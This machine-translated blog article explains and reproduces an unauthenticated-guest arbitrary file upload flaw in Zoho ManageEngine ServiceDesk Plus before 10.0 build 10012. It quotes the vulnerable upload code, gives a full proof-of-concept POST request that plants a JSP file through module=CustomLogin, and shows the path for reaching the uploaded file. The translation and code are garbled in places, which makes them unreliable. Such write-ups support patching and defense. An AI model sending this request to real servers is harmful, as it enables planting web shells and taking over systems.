Shulou(Shulou.com)05/31 Report--

How to analyze and reproduce Zoho arbitrary file upload loopholes, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Brief introduction of vulnerabilities

Zoho Enterprise's product Zoho ManageEngine ServiceDesk Plus is a set of IT Internet service management software, with asset management, procurement management, contract management and other functional modules, to provide first-class IT support services.

Arbitrary file upload vulnerabilities exist in products prior to ServiceDesk Plus10.0 build 10012. Specifically, the FileAttachment_jsp.class of the SDJSPClasses.jar package only checks the uploaded file type when the module parameter is "SSP", "DashBoard" and "HomePage", but does not check the uploaded file type when the module parameter is "CustomLogin", causing malicious elements to use low-privilege guest users to upload and arbitrarily access script files with jsp executable commands.

Affected product

Zohocorp ManageEngine ServiceDesk Plus

Affected version

9.4 and 10.0 before 10.0 build 10012

Repair version

Version > = 10.0 build 10013

Vulnerability verification environment

Ubuntu16.04 (server)

Windows 10 (attack aircraft)

Loophole analysis and utilization

Analyze the file upload logic, determine the location of defects and upload files.

The first step is to install Zohocorp ManageEngine ServiceDesk Plus 10.0 build 10000 on the server, and then start the service. The following figure indicates that the startup is successful.

In the second step, in the attack machine, Burp Suite is used to capture the cookie information and data packets of low-privilege guest users in order to carry out the subsequent construction of POC, as follows.

The third step is to analyze the core code of server file upload. Open\ ManageEngine\ ServiceDesk\ lib\ SDJSPClasses.jar!\ org\ apache\ jsp\ common\ FileAttachment_jsp.class. The core file upload detection code and comments are as follows.

If (sizeOfFile

< maxSize) {limitExceeded = false;filePath = "Attachments" + filSep + module + filSep + value;// 如果module参数是"CustomLogin"，则直接将文件上传至路径"../custom/login"if (module.equals("CustomLogin")) {filePath = ".." + filSep + "custom" + filSep + "login";}File uploadedFile = new File(filePath + filSep + fileName);// 如果module参数是"SSP"、"DashBoard"、"HomePage"，则检查文件后缀是否是"htm"或"html",如不是，则拒绝上传if (module.equals("SSP") || module.equals("DashBoard") || module.equals("HomePage")) {String ext = "";int i = fileName.lastIndexOf(46);if (i >

0) {ext = fileName.substring (I + 1); if (! ext.equals ("htm") & &! ext.equals ("html") {out.write ("\ nssp.widget.onAttachEmpty"); out.write ("\ n"); return;} filSep = "/"; filePath = ".." + filSep + "custom" + filSep + "widgets" + filSep + module;if (module.equals ("DashBoard")) {String view = request.getParameter ("view") FilePath = ".." + filSep + "custom" + filSep + "widgets" + filSep + module + filSep + view;} uploadedFile = new File (filePath + filSep + fileName); int attIndex = false;int attIndex = fileName.lastIndexOf ("."); String name = fileName;ext = ""; if (attIndex! =-1) {name = fileName.substring (0, attIndex); ext = fileName.substring (attIndex);} int j = 0x string fileName1;for (fileName1 = fileName; uploadedFile.exists () UploadedFile = new File (filePath + filSep + fileName1) {fileName1 = name + "(" + j + ")" + ext;++j;} fileName = fileName1;}} File mkdir = new File (filePath); mkdir.mkdirs (); item.wri

According to the analysis, the server first judges whether the module parameter is "CustomLogin". If so, it can directly upload any type of file to the server, and the program is finished; otherwise, continue to execute the code and enter the discrimination process that the module parameter belongs to "SSP", "DashBoard" and "HomePage". If the module parameter is "SSP", "DashBoard" or "HomePage", security filtering can only upload files of type "htm" or "html" to the server. Therefore, when the module parameter is "CustomLogin", you can upload the jsp script file.

The fourth step is to construct PoC. In Burpsuite, the packets are constructed as follows.

POST / common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1Host: 192.168.6.135:8081Content-Length: 366Accept: * / * Origin: http://192.168.6.135:8081X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Content-Type: multipart/form-data Boundary=----aaaReferer: http://192.168.6.135:8081/DashBoard.doAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,vi;q=0.8Cookie: sdpcsrfcookie=bd678a1d-28b9-4eaemure 9d5d5dMurf3a7e6f0bd88; servicedeskplus-_zldp=LsfUh%2FKeku9L3s3nPEJp8WNr%2BtCatkARgcAlZRum6ctL03zZZshSooiaABpQbhelmKwM1K1ctjo%3D; servicedeskplus-_zldt=01bc454f-6f2a-492e-889a-6d6b6ffde97d-2; SDPSESSIONID=B7BB216915E8FB5476DA8774161B9474; JSESSIONID=A7BEE85ED00E1AD81BB9E8081BA49D7D; JSESSIONIDSSO=601A38BD1F283CA55D289D78564E09CAConnection: close-aaaContent-Disposition: form-data; name= "sspsetup" Attach-aaaContent-Disposition: form-data Name= "module" CustomLogin-aaaContent-Disposition: form-data; name= "filePath"; filename= "test.jsp" Content-Type: text/htmlThis is shell content-aaaContent-Disposition: form-data; name= "hmtlcontent"-aaa--

According to the analysis, visit the core code that has the file upload function, set the module parameter to "CustomLogin", and set the content of the test.jsp file to "This is shell content" in the content bar.

Step five, access the script file. After restarting the service, access the script file directly. For example, http://192.168.6.135:8081/custom/login/test.jsp, as follows.

Observation shows that the successful access to the script file indicates that any file is uploaded successfully.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.